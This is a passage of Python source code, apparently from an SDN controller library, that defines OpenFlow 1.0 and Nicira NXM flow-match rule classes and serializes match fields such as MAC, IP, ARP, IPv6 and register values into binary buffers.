self.tun_id = 0
self.arp_spa = 0
self.arp_tpa = 0
self.ipv6_src = []
self.ipv6_dst = []
self.nd_target = []
self.nw_frag = 0
self.regs = [0] * FLOW_N_REGS
self.ipv6_label = 0
class FlowWildcards(object):
def __init__(self):
self.dl_src_mask = 0
self.dl_dst_mask = 0
self.tp_src_mask = 0
self.tp_dst_mask = 0
self.nw_src_mask = 0
self.nw_dst_mask = 0
self.tun_id_mask = 0
self.arp_spa_mask = 0
self.arp_tpa_mask = 0
self.vlan_tci_mask = 0
self.ipv6_src_mask = []
self.ipv6_dst_mask = []
self.nd_target_mask = []
self.nw_frag_mask = 0
self.regs_bits = 0
self.regs_mask = [0] * FLOW_N_REGS
self.wildcards = ofproto_v1_0.OFPFW_ALL
class ClsRule(object):
"""describe a matching rule for OF 1.0 OFPMatch (and NX).
"""
def __init__(self):
self.wc = FlowWildcards()
self.flow = Flow()
def set_in_port(self, port):
self.wc.wildcards &= ~FWW_IN_PORT
self.flow.in_port = port
def set_dl_vlan(self, dl_vlan):
self.wc.wildcards &= ~ofproto_v1_0.OFPFW_DL_VLAN
self.flow.dl_vlan = dl_vlan
def set_dl_vlan_pcp(self, dl_vlan_pcp):
self.wc.wildcards &= ~ofproto_v1_0.OFPFW_DL_VLAN_PCP
self.flow.dl_vlan_pcp = dl_vlan_pcp
def set_dl_dst(self, dl_dst):
self.flow.dl_dst = dl_dst
def set_dl_dst_masked(self, dl_dst, mask):
self.wc.dl_dst_mask = mask
# bit-wise and of the corresponding elements of dl_dst and mask
self.flow.dl_dst = mac.haddr_bitand(dl_dst, mask)
def set_dl_src(self, dl_src):
self.flow.dl_src = dl_src
def set_dl_src_masked(self, dl_src, mask):
self.wc.dl_src_mask = mask
self.flow.dl_src = mac.haddr_bitand(dl_src, mask)
def set_dl_type(self, dl_type):
self.wc.wildcards &= ~FWW_DL_TYPE
self.flow.dl_type = dl_type
def set_dl_tci(self, tci):
self.set_dl_tci_masked(tci, UINT16_MAX)
def set_dl_tci_masked(self, tci, mask):
self.wc.vlan_tci_mask = mask
self.flow.vlan_tci = tci
def set_tp_src(self, tp_src):
self.set_tp_src_masked(tp_src, UINT16_MAX)
def set_tp_src_masked(self, tp_src, mask):
self.wc.tp_src_mask = mask
self.flow.tp_src = tp_src & mask
def set_tp_dst(self, tp_dst):
self.set_tp_dst_masked(tp_dst, UINT16_MAX)
def set_tp_dst_masked(self, tp_dst, mask):
self.wc.tp_dst_mask = mask
self.flow.tp_dst = tp_dst & mask
def set_nw_proto(self, nw_proto):
self.wc.wildcards &= ~FWW_NW_PROTO
self.flow.nw_proto = nw_proto
def set_nw_src(self, nw_src):
self.set_nw_src_masked(nw_src, UINT32_MAX)
def set_nw_src_masked(self, nw_src, mask):
self.flow.nw_src = nw_src
self.wc.nw_src_mask = mask
def set_nw_dst(self, nw_dst):
self.set_nw_dst_masked(nw_dst, UINT32_MAX)
def set_nw_dst_masked(self, nw_dst, mask):
self.flow.nw_dst = nw_dst
self.wc.nw_dst_mask = mask
def set_nw_dscp(self, nw_dscp):
self.wc.wildcards &= ~FWW_NW_DSCP
self.flow.nw_tos &= ~IP_DSCP_MASK
self.flow.nw_tos |= nw_dscp & IP_DSCP_MASK
def set_icmp_type(self, icmp_type):
self.set_tp_src(icmp_type)
def set_icmp_code(self, icmp_code):
self.set_tp_dst(icmp_code)
def set_tun_id(self, tun_id):
self.set_tun_id_masked(tun_id, UINT64_MAX)
def set_tun_id_masked(self, tun_id, mask):
self.wc.tun_id_mask = mask
self.flow.tun_id = tun_id & mask
def set_nw_ecn(self, nw_ecn):
self.wc.wildcards &= ~FWW_NW_ECN
self.flow.nw_tos &= ~IP_ECN_MASK
self.flow.nw_tos |= nw_ecn & IP_ECN_MASK
def set_nw_ttl(self, nw_ttl):
self.wc.wildcards &= ~FWW_NW_TTL
self.flow.nw_ttl = nw_ttl
def set_nw_frag(self, nw_frag):
self.wc.nw_frag_mask |= FLOW_NW_FRAG_MASK
self.flow.nw_frag = nw_frag
def set_nw_frag_masked(self, nw_frag, mask):
self.wc.nw_frag_mask = mask
self.flow.nw_frag = nw_frag & mask
def set_arp_spa(self, spa):
self.set_arp_spa_masked(spa, UINT32_MAX)
def set_arp_spa_masked(self, spa, mask):
self.flow.arp_spa = spa
self.wc.arp_spa_mask = mask
def set_arp_tpa(self, tpa):
self.set_arp_tpa_masked(tpa, UINT32_MAX)
def set_arp_tpa_masked(self, tpa, mask):
self.flow.arp_tpa = tpa
self.wc.arp_tpa_mask = mask
def set_arp_sha(self, sha):
self.wc.wildcards &= ~FWW_ARP_SHA
self.flow.arp_sha = sha
def set_arp_tha(self, tha):
self.wc.wildcards &= ~FWW_ARP_THA
self.flow.arp_tha = tha
def set_icmpv6_type(self, icmp_type):
self.set_tp_src(icmp_type)
def set_icmpv6_code(self, icmp_code):
self.set_tp_dst(icmp_code)
def set_ipv6_label(self, label):
self.wc.wildcards &= ~FWW_IPV6_LABEL
self.flow.ipv6_label = label
def set_ipv6_label(self, label):
self.wc.wildcards &= ~FWW_IPV6_LABEL
self.flow.ipv6_label = label
def set_ipv6_src_masked(self, src, mask):
self.wc.ipv6_src_mask = mask
self.flow.ipv6_src = [x & y for (x, y) in itertools.izip(src, mask)]
def set_ipv6_src(self, src):
self.flow.ipv6_src = src
def set_ipv6_dst_masked(self, dst, mask):
self.wc.ipv6_dst_mask = mask
self.flow.ipv6_dst = [x & y for (x, y) in itertools.izip(dst, mask)]
def set_ipv6_dst(self, dst):
self.flow.ipv6_dst = dst
def set_nd_target_masked(self, target, mask):
self.wc.nd_target_mask = mask
self.flow.nd_target = [x & y for (x, y) in
itertools.izip(target, mask)]
def set_nd_target(self, target):
self.flow.nd_target = target
def set_reg(self, reg_idx, value):
self.set_reg_masked(reg_idx, value, 0)
def set_reg_masked(self, reg_idx, value, mask):
self.wc.regs_mask[reg_idx] = mask
self.flow.regs[reg_idx] = value
self.wc.regs_bits |= (1 << reg_idx)
def flow_format(self):
# Tunnel ID is only supported by NXM
if self.wc.tun_id_mask != 0:
return ofproto_v1_0.NXFF_NXM
# Masking DL_DST is only supported by NXM
if self.wc.dl_dst_mask:
return ofproto_v1_0.NXFF_NXM
# Masking DL_SRC is only supported by NXM
if self.wc.dl_src_mask:
return ofproto_v1_0.NXFF_NXM
# ECN is only supported by NXM
if not self.wc.wildcards & FWW_NW_ECN:
return ofproto_v1_0.NXFF_NXM
return ofproto_v1_0.NXFF_OPENFLOW10
def match_tuple(self):
"""return a tuple which can be used as *args for
ofproto_v1_0_parser.OFPMatch.__init__().
see Datapath.send_flow_mod.
"""
assert self.flow_format() == ofproto_v1_0.NXFF_OPENFLOW10
wildcards = ofproto_v1_0.OFPFW_ALL
if not self.wc.wildcards & FWW_IN_PORT:
wildcards &= ~ofproto_v1_0.OFPFW_IN_PORT
if self.flow.dl_src != mac.DONTCARE:
wildcards &= ~ofproto_v1_0.OFPFW_DL_SRC
if self.flow.dl_dst != mac.DONTCARE:
wildcards &= ~ofproto_v1_0.OFPFW_DL_DST
if not self.wc.wildcards & FWW_DL_TYPE:
wildcards &= ~ofproto_v1_0.OFPFW_DL_TYPE
if self.flow.dl_vlan != 0:
wildcards &= ~ofproto_v1_0.OFPFW_DL_VLAN
if self.flow.dl_vlan_pcp != 0:
wildcards &= ~ofproto_v1_0.OFPFW_DL_VLAN_PCP
if self.flow.nw_tos != 0:
wildcards &= ~ofproto_v1_0.OFPFW_NW_TOS
if self.flow.nw_proto != 0:
wildcards &= ~ofproto_v1_0.OFPFW_NW_PROTO
if self.wc.nw_src_mask != 0 and "01" not in bin(self.wc.nw_src_mask):
wildcards &= ~ofproto_v1_0.OFPFW_NW_SRC_MASK
maskbits = (bin(self.wc.nw_src_mask).count("0") - 1)
wildcards |= (maskbits << ofproto_v1_0.OFPFW_NW_SRC_SHIFT)
if self.wc.nw_dst_mask != 0 and "01" not in bin(self.wc.nw_dst_mask):
wildcards &= ~ofproto_v1_0.OFPFW_NW_DST_MASK
maskbits = (bin(self.wc.nw_dst_mask).count("0") - 1)
wildcards |= (maskbits << ofproto_v1_0.OFPFW_NW_DST_SHIFT)
if self.flow.tp_src != 0:
wildcards &= ~ofproto_v1_0.OFPFW_TP_SRC
if self.flow.tp_dst != 0:
wildcards &= ~ofproto_v1_0.OFPFW_TP_DST
return (wildcards, self.flow.in_port, self.flow.dl_src,
self.flow.dl_dst, self.flow.dl_vlan, self.flow.dl_vlan_pcp,
self.flow.dl_type, self.flow.nw_tos & IP_DSCP_MASK,
self.flow.nw_proto, self.flow.nw_src, self.flow.nw_dst,
self.flow.tp_src, self.flow.tp_dst)
def _set_nxm_headers(nxm_headers):
'''Annotate corresponding NXM header'''
def _set_nxm_headers_dec(self):
self.nxm_headers = nxm_headers
return self
return _set_nxm_headers_dec
def _register_make(cls):
'''class decorator to Register mf make'''
assert cls.nxm_headers is not None
assert cls.nxm_headers is not []
for nxm_header in cls.nxm_headers:
assert nxm_header not in _MF_FIELDS
_MF_FIELDS[nxm_header] = cls.make
return cls
def mf_from_nxm_header(nxm_header):
if nxm_header not in _MF_FIELDS:
return None
make = _MF_FIELDS.get(nxm_header)
assert make is not None
return make(nxm_header)
class MFField(object):
_FIELDS_HEADERS = {}
@staticmethod
def register_field_header(headers):
def _register_field_header(cls):
for header in headers:
MFField._FIELDS_HEADERS[header] = cls
return cls
return _register_field_header
def __init__(self, nxm_header, pack_str):
self.nxm_header = nxm_header
self.pack_str = pack_str
self.n_bytes = struct.calcsize(pack_str)
self.n_bits = self.n_bytes * 8
@classmethod
def parser(cls, buf, offset):
(header,) = struct.unpack_from('!I', buf, offset)
cls_ = MFField._FIELDS_HEADERS.get(header)
if cls_:
field = cls_.field_parser(header, buf, offset)
else:
# print 'unknown field type'
raise
field.length = (header & 0xff) + 4
return field
@classmethod
def field_parser(cls, header, buf, offset):
hasmask = (header >> 8) & 1
mask = None
if hasmask:
pack_str = '!' + cls.pack_str[1:] * 2
(value, mask) = struct.unpack_from(pack_str, buf,
offset + 4)
else:
(value,) = struct.unpack_from(cls.pack_str, buf,
offset + 4)
return cls(header, value, mask)
def _put(self, buf, offset, value):
ofproto_parser.msg_pack_into(self.pack_str, buf, offset, value)
return self.n_bytes
def putw(self, buf, offset, value, mask):
len_ = self._put(buf, offset, value)
return len_ + self._put(buf, offset + len_, mask)
def _is_all_ones(self, value):
return value == (1 << self.n_bits) - 1
def putm(self, buf, offset, value, mask):
if mask == 0:
return 0
elif self._is_all_ones(mask):
return self._put(buf, offset, value)
else:
return self.putw(buf, offset, value, mask)
def _putv6(self, buf, offset, value):
ofproto_parser.msg_pack_into(self.pack_str, buf, offset,
*value)
return self.n_bytes
def putv6(self, buf, offset, value, mask):
len_ = self._putv6(buf, offset, value)
if len(mask):
return len_ + self._putv6(buf, offset + len_, mask)
return len_
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_OF_IN_PORT])
@MFField.register_field_header([ofproto_v1_0.NXM_OF_IN_PORT])
class MFInPort(MFField):
pack_str = MF_PACK_STRING_BE16
def __init__(self, header, value, mask=None):
super(MFInPort, self).__init__(header, MFInPort.pack_str)
self.value = value
@classmethod
def make(cls, header):
return cls(header, MFInPort.pack_str)
def put(self, buf, offset, rule):
return self._put(buf, offset, rule.flow.in_port)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_OF_ETH_DST, ofproto_v1_0.NXM_OF_ETH_DST_W])
@MFField.register_field_header([ofproto_v1_0.NXM_OF_ETH_DST,
ofproto_v1_0.NXM_OF_ETH_DST_W])
class MFEthDst(MFField):
pack_str = MF_PACK_STRING_MAC
def __init__(self, header, value, mask=None):
super(MFEthDst, self).__init__(header, MFEthDst.pack_str)
self.value = value
@classmethod
def make(cls, header):
return cls(header, MFEthDst.pack_str)
def put(self, buf, offset, rule):
if rule.wc.dl_dst_mask:
return self.putw(buf, offset, rule.flow.dl_dst,
rule.wc.dl_dst_mask)
else:
return self._put(buf, offset, rule.flow.dl_dst)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_OF_ETH_SRC, ofproto_v1_0.NXM_OF_ETH_SRC_W])
@MFField.register_field_header([ofproto_v1_0.NXM_OF_ETH_SRC,
ofproto_v1_0.NXM_OF_ETH_SRC_W])
class MFEthSrc(MFField):
pack_str = MF_PACK_STRING_MAC
def __init__(self, header, value, mask=None):
super(MFEthSrc, self).__init__(header, MFEthSrc.pack_str)
self.value = value
@classmethod
def make(cls, header):
return cls(header, MFEthSrc.pack_str)
def put(self, buf, offset, rule):
if rule.wc.dl_src_mask:
return self.putw(buf, offset, rule.flow.dl_src,
rule.wc.dl_src_mask)
else:
return self._put(buf, offset, rule.flow.dl_src)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_OF_ETH_TYPE])
@MFField.register_field_header([ofproto_v1_0.NXM_OF_ETH_TYPE])
class MFEthType(MFField):
pack_str = MF_PACK_STRING_BE16
def __init__(self, header, value, mask=None):
super(MFEthType, self).__init__(header, MFEthType.pack_str)
self.value = value
@classmethod
def make(cls, header):
return cls(header, MFEthType.pack_str)
def put(self, buf, offset, rule):
return self._put(buf, offset, rule.flow.dl_type)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_OF_VLAN_TCI,
ofproto_v1_0.NXM_OF_VLAN_TCI_W])
@MFField.register_field_header([ofproto_v1_0.NXM_OF_VLAN_TCI,
ofproto_v1_0.NXM_OF_VLAN_TCI_W])
class MFVlan(MFField):
pack_str = MF_PACK_STRING_BE16
def __init__(self, header, value, mask=None):
super(MFVlan, self).__init__(header, MFVlan.pack_str)
self.value = value
@classmethod
def make(cls, header):
return cls(header, MFVlan.pack_str)
def put(self, buf, offset, rule):
return self.putm(buf, offset, rule.flow.vlan_tci,
rule.wc.vlan_tci_mask)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_OF_IP_TOS])
@MFField.register_field_header([ofproto_v1_0.NXM_OF_IP_TOS])
class MFIPDSCP(MFField):
pack_str = MF_PACK_STRING_8
def __init__(self, header, value, mask=None):
super(MFIPDSCP, self).__init__(header, MFIPDSCP.pack_str)
self.value = value
@classmethod
def make(cls, header):
return cls(header, MFIPDSCP.pack_str)
def put(self, buf, offset, rule):
return self._put(buf, offset,
rule.flow.nw_tos & IP_DSCP_MASK)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_NX_TUN_ID,
ofproto_v1_0.NXM_NX_TUN_ID_W])
@MFField.register_field_header([ofproto_v1_0.NXM_NX_TUN_ID,
ofproto_v1_0.NXM_NX_TUN_ID_W])
class MFTunId(MFField):
pack_str = MF_PACK_STRING_BE64
def __init__(self, header, value, mask=None):
super(MFTunId, self).__init__(header, MFTunId.pack_str)
self.value = value
@classmethod
def make(cls, header):
return cls(header, MFTunId.pack_str)
def put(self, buf, offset, rule):
return self.putm(buf, offset, rule.flow.tun_id, rule.wc.tun_id_mask)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_OF_IP_SRC, ofproto_v1_0.NXM_OF_IP_SRC_W])
@MFField.register_field_header([ofproto_v1_0.NXM_OF_IP_SRC,
ofproto_v1_0.NXM_OF_IP_SRC_W])
class MFIPSrc(MFField):
pack_str = MF_PACK_STRING_BE32
def __init__(self, header, value, mask=None):
super(MFIPSrc, self).__init__(header, MFIPSrc.pack_str)
self.value = value
self.mask = mask
@classmethod
def make(cls, header):
return cls(header, MFIPSrc.pack_str)
def put(self, buf, offset, rule):
return self.putm(buf, offset, rule.flow.nw_src, rule.wc.nw_src_mask)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_OF_IP_DST, ofproto_v1_0.NXM_OF_IP_DST_W])
@MFField.register_field_header([ofproto_v1_0.NXM_OF_IP_DST,
ofproto_v1_0.NXM_OF_IP_DST_W])
class MFIPDst(MFField):
pack_str = MF_PACK_STRING_BE32
def __init__(self, header, value, mask=None):
super(MFIPDst, self).__init__(header, MFIPDst.pack_str)
self.value = value
self.mask = mask
@classmethod
def make(cls, header):
return cls(header, MFIPDst.pack_str)
def put(self, buf, offset, rule):
return self.putm(buf, offset, rule.flow.nw_dst, rule.wc.nw_dst_mask)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_NX_IP_ECN])
class MFIPECN(MFField):
@classmethod
def make(cls, header):
return cls(header, MF_PACK_STRING_8)
def put(self, buf, offset, rule):
return self._put(buf, offset,
rule.flow.nw_tos & IP_ECN_MASK)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_NX_IP_TTL])
class MFIPTTL(MFField):
@classmethod
def make(cls, header):
return cls(header, MF_PACK_STRING_8)
def put(self, buf, offset, rule):
return self._put(buf, offset, rule.flow.nw_ttl)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_OF_IP_PROTO])
class MFIPProto(MFField):
@classmethod
def make(cls, header):
return cls(header, MF_PACK_STRING_8)
def put(self, buf, offset, rule):
return self._put(buf, offset, rule.flow.nw_proto)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_OF_TCP_SRC, ofproto_v1_0.NXM_OF_TCP_SRC_W,
ofproto_v1_0.NXM_OF_UDP_SRC, ofproto_v1_0.NXM_OF_UDP_SRC_W])
class MFTPSRC(MFField):
@classmethod
def make(cls, header):
return cls(header, MF_PACK_STRING_BE16)
def put(self, buf, offset, rule):
return self.putm(buf, offset, rule.flow.tp_src, rule.wc.tp_src_mask)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_OF_TCP_DST, ofproto_v1_0.NXM_OF_TCP_DST_W,
ofproto_v1_0.NXM_OF_UDP_DST, ofproto_v1_0.NXM_OF_UDP_DST_W])
class MFTPDST(MFField):
@classmethod
def make(cls, header):
return cls(header, MF_PACK_STRING_BE16)
def put(self, buf, offset, rule):
return self.putm(buf, offset, rule.flow.tp_dst, rule.wc.tp_dst_mask)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_OF_ARP_SPA, ofproto_v1_0.NXM_OF_ARP_SPA_W])
class MFArpSpa(MFField):
@classmethod
def make(cls, header):
return cls(header, MF_PACK_STRING_BE32)
def put(self, buf, offset, rule):
return self.putm(buf, offset, rule.flow.arp_spa, rule.wc.arp_spa_mask)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_OF_ARP_TPA, ofproto_v1_0.NXM_OF_ARP_TPA_W])
class MFArpTpa(MFField):
@classmethod
def make(cls, header):
return cls(header, MF_PACK_STRING_BE32)
def put(self, buf, offset, rule):
return self.putm(buf, offset, rule.flow.arp_tpa, rule.wc.arp_tpa_mask)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_NX_ARP_SHA])
class MFArpSha(MFField):
@classmethod
def make(cls, header):
return cls(header, MF_PACK_STRING_MAC)
def put(self, buf, offset, rule):
return self._put(buf, offset, rule.flow.arp_sha)
class MFIPV6(object):
pack_str = MF_PACK_STRING_IPV6
@classmethod
def field_parser(cls, header, buf, offset):
hasmask = (header >> 8) & 1
if hasmask:
pack_string = '!' + cls.pack_str[1:] * 2
value = struct.unpack_from(pack_string, buf, offset + 4)
return cls(header, list(value[:8]), list(value[8:]))
else:
value = struct.unpack_from(cls.pack_str, buf, offset + 4)
return cls(header, list(value))
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_NX_IPV6_SRC,
ofproto_v1_0.NXM_NX_IPV6_SRC_W])
@MFField.register_field_header([ofproto_v1_0.NXM_NX_IPV6_SRC,
ofproto_v1_0.NXM_NX_IPV6_SRC_W])
class MFIPV6Src(MFIPV6, MFField):
def __init__(self, header, value, mask=None):
super(MFIPV6Src, self).__init__(header, MFIPV6Src.pack_str)
self.value = value
self.mask = mask
@classmethod
def make(cls, header):
return cls(header, cls.pack_str)
def put(self, buf, offset, rule):
return self.putv6(buf, offset,
rule.flow.ipv6_src,
rule.wc.ipv6_src_mask)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_NX_IPV6_DST,
ofproto_v1_0.NXM_NX_IPV6_DST_W])
@MFField.register_field_header([ofproto_v1_0.NXM_NX_IPV6_DST,
ofproto_v1_0.NXM_NX_IPV6_DST_W])
class MFIPV6Dst(MFIPV6, MFField):
def __init__(self, header, value, mask=None):
super(MFIPV6Dst, self).__init__(header, MFIPV6Dst.pack_str)
self.value = value
self.mask = mask
@classmethod
def make(cls, header):
return cls(header, cls.pack_str)
def put(self, buf, offset, rule):
return self.putv6(buf, offset,
rule.flow.ipv6_dst,
rule.wc.ipv6_dst_mask)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_NX_ND_TARGET,
ofproto_v1_0.NXM_NX_ND_TARGET_W])
class MFNdTarget(MFField):
@classmethod
def make(cls, header):
return cls(header, '!4I')
def put(self, buf, offset, rule):
return self.putv6(buf, offset,
rule.flow.nd_target,
rule.wc.nd_target_mask)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_NX_IP_FRAG,
ofproto_v1_0.NXM_NX_IP_FRAG_W])
class MFIpFrag(MFField):
@classmethod
def make(cls, header):
return cls(header, '!B')
def put(self, buf, offset, rule):
if rule.wc.nw_frag_mask == FLOW_NW_FRAG_MASK:
return self._put(buf, offset, rule.flow.nw_frag)
else:
return self.putw(buf, offset, rule.flow.nw_frag,
rule.wc.nw_frag_mask & FLOW_NW_FRAG_MASK)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_NX_ARP_THA])
class MFArpTha(MFField):
@classmethod
def make(cls, header):
return cls(header, MF_PACK_STRING_MAC)
def put(self, buf, offset, rule):
return self._put(buf, offset, rule.flow.arp_tha)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_OF_ICMP_TYPE])
class MFICMPType(MFField):
@classmethod
def make(cls, header):
return cls(header, MF_PACK_STRING_8)
def put(self, buf, offset, rule):
return self._put(buf, offset, rule.flow.tp_src)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_OF_ICMP_CODE])
class MFICMPCode(MFField):
@classmethod
def make(cls, header):
return cls(header, MF_PACK_STRING_8)
def put(self, buf, offset, rule):
return self._put(buf, offset, rule.flow.tp_dst)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_NX_ICMPV6_TYPE])
class MFICMPV6Type(MFField):
@classmethod
def make(cls, header):
return cls(header, MF_PACK_STRING_8)
def put(self, buf, offset, rule):
return self._put(buf, offset, rule.flow.tp_src)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_NX_ICMPV6_CODE])
class MFICMPV6Code(MFField):
@classmethod
def make(cls, header):
return cls(header, MF_PACK_STRING_8)
def put(self, buf, offset, rule):
return self._put(buf, offset, rule.flow.tp_dst)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_NX_IPV6_LABEL])
class MFICMPV6Label(MFField):
@classmethod
def make(cls, header):
return cls(header, MF_PACK_STRING_BE32)
def put(self, buf, offset, rule):
return self._put(buf, offset, rule.flow.ipv6_label)
@_register_make
@_set_nxm_headers([ofproto_v1_0.nxm_nx_reg(i) for i in range(FLOW_N_REGS)]
+ [ofproto_v1_0.nxm_nx_reg_w(i) for i in range(FLOW_N_REGS)])
class MFRegister(MFField):
@classmethod
def make(cls, header):
return cls(header, MF_PACK_STRING_BE32)
def put(self, buf, offset, rule):
for i in range(FLOW_N_REGS):
if (ofproto_v1_0.nxm_nx_reg(i) == self.nxm_header or
ofproto_v1_0.nxm_nx_reg_w(i) == self.nxm_header):
if rule.wc.regs_mask[i]:
return self.putm(buf, offset, rule.flow.regs[i],
rule.wc.regs_mask[i])
else:
return self._put(buf, offset, rule.flow.regs[i])
def serialize_nxm_match(rule, buf, offset):
old_offset = offset
if not rule.wc.wildcards & FWW_IN_PORT:
offset += nxm_put(buf, offset, ofproto_v1_0.NXM_OF_IN_PORT, rule)
# Ethernet.
if rule.flow.dl_dst != mac.DONTCARE:
if rule.wc.dl_dst_mask:
header = ofproto_v1_0.NXM_OF_ETH_DST_W
else:
header = ofproto_v1_0.NXM_OF_ETH_DST
offset += nxm_put(buf, offset, header, rule)
if rule.flow.dl_src != mac.DONTCARE:
if rule.wc.dl_src_mask:
header = ofproto_v1_0.NXM_OF_ETH_SRC_W
else:
header = ofproto_v1_0.NXM_OF_ETH_SRC
offset += nxm_put(buf, offset, header, rule)
if not rule.wc.wildcards & FWW_DL_TYPE:
offset += nxm_put(buf, offset, ofproto_v1_0.NXM_OF_ETH_TYPE, rule)
# 802.1Q
if rule.wc.vlan_tci_mask != 0:
if rule.wc.vlan_tci_mask == UINT16_MAX:
header = ofproto_v1_0.NXM_OF_VLAN_TCI
else:
header = ofproto_v1_0.NXM_OF_VLAN_TCI_W
offset += nxm_put(buf, offset, header, rule)
# L3
if not rule.wc.wildcards & FWW_NW_DSCP:
offset += nxm_put(buf, offset, ofproto_v1_0.NXM_OF_IP_TOS, rule)
if not rule.wc.wildcards & FWW_NW_ECN:
offset += nxm_put(buf, offset, ofproto_v1_0.NXM_NX_IP_ECN, rule)
if not rule.wc.wildcards & FWW_NW_TTL:
offset += nxm_put(buf, offset, ofproto_v1_0.NXM_NX_IP_TTL, rule)
if not rule.wc.wildcards & FWW_NW_PROTO:
offset += nxm_put(buf, offset, ofproto_v1_0.NXM_OF_IP_PROTO, rule)
if not rule.wc.wildcards & FWW_NW_PROTO and (rule.flow.nw_proto
== inet.IPPROTO_ICMP):
if rule.wc.tp_src_mask != 0:
offset += nxm_put(buf, offset, ofproto_v1_0.NXM_OF_ICMP_TYPE, rule)
if rule.wc.tp_dst_mask != 0:
offset += nxm_put(buf, offset, ofproto_v1_0.NXM_OF_ICMP_CODE, rule)
if rule.flow.tp_src != 0:
if rule.flow.nw_proto == 6:
if rule.wc.tp_src_mask == UINT16_MAX:
header = ofproto_v1_0.NXM_OF_TCP_SRC
else:
header = ofproto_v1_0.NXM_OF_TCP_SRC_W
elif rule.flow.nw_proto == 17:
if rule.wc.tp_src_mask == UINT16_MAX:
header = ofproto_v1_0.NXM_OF_UDP_SRC
else:
header = ofproto_v1_0.NXM_OF_UDP_SRC_W
else:
header = 0
if header != 0:
offset += nxm_put(buf, offset, header, rule)
if rule.flow.tp_dst != 0:
if rule.flow.nw_proto == 6:
if rule.wc.tp_dst_mask == UINT16_MAX:
header = ofproto_v1_0.NXM_OF_TCP_DST
else:
header = ofproto_v1_0.NXM_OF_TCP_DST_W
elif rule.flow.nw_proto == 17:
if rule.wc.tp_dst_mask == UINT16_MAX:
header = ofproto_v1_0.NXM_OF_UDP_DST
else:
header = ofproto_v1_0.NXM_OF_UDP_DST_W
else:
header = 0
if header != 0:
offset += nxm_put(buf, offset, header, rule)
# IP Source and Destination
if rule.flow.nw_src != 0:
if rule.wc.nw_src_mask == UINT32_MAX:
header = ofproto_v1_0.NXM_OF_IP_SRC
else:
header = ofproto_v1_0.NXM_OF_IP_SRC_W
offset += nxm_put(buf, offset, header, rule)
if rule.flow.nw_dst != 0:
if rule.wc.nw_dst_mask == UINT32_MAX:
header = ofproto_v1_0.NXM_OF_IP_DST
else:
header = ofproto_v1_0.NXM_OF_IP_DST_W
offset += nxm_put(buf, offset, header, rule)
# IPv6
if not rule.wc.wildcards & FWW_NW_PROTO and (rule.flow.nw_proto
== inet.IPPROTO_ICMPV6):
if rule.wc.tp_src_mask != 0:
offset += nxm_put(buf, offset, ofproto_v1_0.NXM_NX_ICMPV6_TYPE,
rule)
if rule.wc.tp_dst_mask != 0:
offset += nxm_put(buf, offset, ofproto_v1_0.NXM_NX_ICMPV6_CODE,
rule)
if not rule.wc.wildcards & FWW_IPV6_LABEL:
offset += nxm_put(buf, offset, ofproto_v1_0.NXM_NX_IPV6_LABEL, rule)
if len(rule.flow.ipv6_src):
if len(rule.wc.ipv6_src_mask):
header = ofproto_v1_0.NXM_NX_IPV6_SRC_W
else:
header = ofproto_v1_0.NXM_NX_IPV6_SRC
offset += nxm_put(buf, offset, header, rule)
if len(rule.flow.ipv6_dst):
if len(rule.wc.ipv6_dst_mask):
header = ofproto_v1_0.NXM_NX_IPV6_DST_W
else:
header = ofproto_v1_0.NXM_NX_IPV6_DST
offset += nxm_put(buf, offset, header, rule)
if len(rule.flow.nd_target):
if len(rule.wc.nd_target_mask):
header = ofproto_v1_0.NXM_NX_ND_TARGET_W
else:
header = ofproto_v1_0.NXM_NX_ND_TARGET
offset += nxm_put(buf, offset, header, rule)
# ARP
if rule.flow.arp_spa != 0:
if rule.wc.arp_spa_mask == UINT32_MAX:
header = ofproto_v1_0.NXM_OF_ARP_SPA
else:
header = ofproto_v1_0.NXM_OF_ARP_SPA_W
offset += nxm_put(buf, offset, header, rule)
if rule.flow.arp_tpa != 0:
if rule.wc.arp_tpa_mask == UINT32_MAX:
header = ofproto_v1_0.NXM_OF_ARP_TPA
else:
header = ofproto_v1_0.NXM_OF_ARP_TPA_W
offset += nxm_put(buf, offset, header, rule)
if not rule.wc.wildcards & FWW_ARP_SHA:
offset += nxm_put(buf, offset, ofproto_v1_0.NXM_NX_ARP_SHA, rule)
if not rule.wc.wildcards & FWW_ARP_THA:
offset += nxm_put(buf, offset, ofproto_v1_0.NXM_NX_ARP_THA, rule)
if rule.flow.nw_frag:
if rule.wc.nw_frag_mask == FLOW_NW_FRAG_MASK:
header = ofproto_v1_0.NXM_NX_IP_FRAG
else:
header = ofproto_v1_0.NXM_NX_IP_FRAG_W
offset += nxm_put(buf, offset, header, rule)
# Tunnel Id
if rule.wc.tun_id_mask != 0:
if rule.wc.tun_id_mask == UINT64_MAX:
header = ofproto_v1_0.NXM_NX_TUN_ID
else:
header = ofproto_v1_0.NXM_NX_TUN_ID_W
offset += nxm_put(buf, offset, header, rule)
# XXX: Cookie
for i in range(FLOW_N_REGS):
if rule.wc.regs_bits & (1 << i):
if rule.wc.regs_mask[i]:
header = ofproto_v1_0.nxm_nx_reg_w(i)
else:
